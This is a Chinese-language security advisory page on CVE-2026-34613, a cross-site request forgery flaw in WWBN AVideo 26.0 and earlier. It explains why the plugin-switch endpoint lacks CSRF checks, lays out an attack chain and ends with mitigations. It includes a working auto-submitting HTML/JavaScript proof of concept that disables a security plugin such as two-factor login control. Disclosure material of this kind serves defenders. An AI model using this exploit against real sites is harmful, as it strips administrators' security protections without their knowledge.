IPBUF安全漏洞报告
English
CVE-2026-34613 CVSS 6.5 中危

CVE-2026-34613 AVideo跨站请求伪造漏洞

披露日期: 2026-03-31

漏洞信息

漏洞编号
CVE-2026-34613
漏洞类型
跨站请求伪造 (CSRF)
CVSS评分
6.5 中危
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
需要交互 (UI:R)
影响产品
WWBN AVideo

相关标签

CSRFAVideo跨站请求伪造插件安全

漏洞概述

WWBN AVideo是一个开源视频平台。在26.0及之前版本中,objects/pluginSwitch.json.php端点存在跨站请求伪造(CSRF)漏洞。虽然该端点检查管理员会话,但未验证CSRF令牌。此外,由于插件数据库表被列在ignoreTableSecurityCheck()中,绕过了ORM级别的Referer/Origin域验证。结合SameSite=None的会话Cookie设置,攻击者可以诱导管理员访问恶意页面,从而禁用关键安全插件(如LoginControl双因素认证、订阅执行或访问控制插件)。发布时尚无可用补丁。

技术细节

该漏洞的核心在于CSRF防护机制的缺失以及ORM安全检查的绕过。攻击者利用objects/pluginSwitch.json.php接口功能,该接口允许管理员通过POST请求切换插件状态(启用/禁用)。首先,该接口仅验证了是否存在活跃的管理员Session,完全缺失CSRF Token的校验,导致无法区分请求来源是否可信。其次,AVideo框架的ORM层通常在ObjectYPT::save()方法中进行Referer或Origin头部的域校验以防止CSRF。然而,开发人员将插件表(plugins)显式添加到了ignoreTableSecurityCheck()白名单中。这意味着当操作插件表数据时,这一层防御被主动绕过。最后,由于会话Cookie设置了SameSite=None属性,浏览器不会阻止跨站点请求携带Cookie。攻击者只需构造一个隐藏的HTML表单或AJAX请求指向受影响端点,诱导已登录的管理员点击,即可在后台执行禁用安全插件的操作,进而削弱系统的整体安全性。

攻击链分析

STEP 1
侦察
攻击者识别出目标网站使用的是WWBN AVideo平台,且版本在26.0或以下。
STEP 2
制作恶意页面
攻击者构造一个包含恶意JavaScript代码的HTML页面,该代码向`objects/pluginSwitch.json.php`发送禁用安全插件(如LoginControl)的POST请求。
STEP 3
社会工程学攻击
攻击者通过邮件或即时通讯工具,诱导拥有管理员权限的用户点击并访问该恶意页面链接。
STEP 4
执行CSRF攻击
由于管理员当前处于登录状态且Cookie未设置SameSite限制,浏览器在加载页面时自动携带Session Cookie发送了禁用插件的请求。
STEP 5
达成利用
服务器端因缺少CSRF Token校验且绕过了Referer检查,执行了请求,导致关键安全插件被禁用,系统防御能力下降。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
<!-- Proof of Concept for CVE-2026-34613 --> <!-- This PoC demonstrates how an attacker could disable a security plugin via CSRF --> <html> <body> <script> function exploit() { var xhr = new XMLHttpRequest(); xhr.open("POST", "https://[target-site]/objects/pluginSwitch.json.php", true); xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); // Payload to disable a plugin. // Parameters might vary (e.g., plugins_id, status). var params = "plugins_id=[TARGET_PLUGIN_ID]&status=0"; xhr.send(params); } // Automatically trigger the exploit exploit(); </script> <h1>CVE-2026-34613 CSRF PoC</h1> <p>If you are an admin, a security plugin might be disabled.</p> </body> </html>

影响范围

WWBN AVideo <= 26.0

防御指南

临时缓解措施
由于目前没有可用的补丁,建议管理员暂时限制后台管理页面的访问IP地址范围,只允许可信网络访问。同时,应加强管理员的安全意识教育,避免在登录后台时点击不明链接。可以在应用层手动添加CSRF Token验证逻辑作为临时修复方案。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表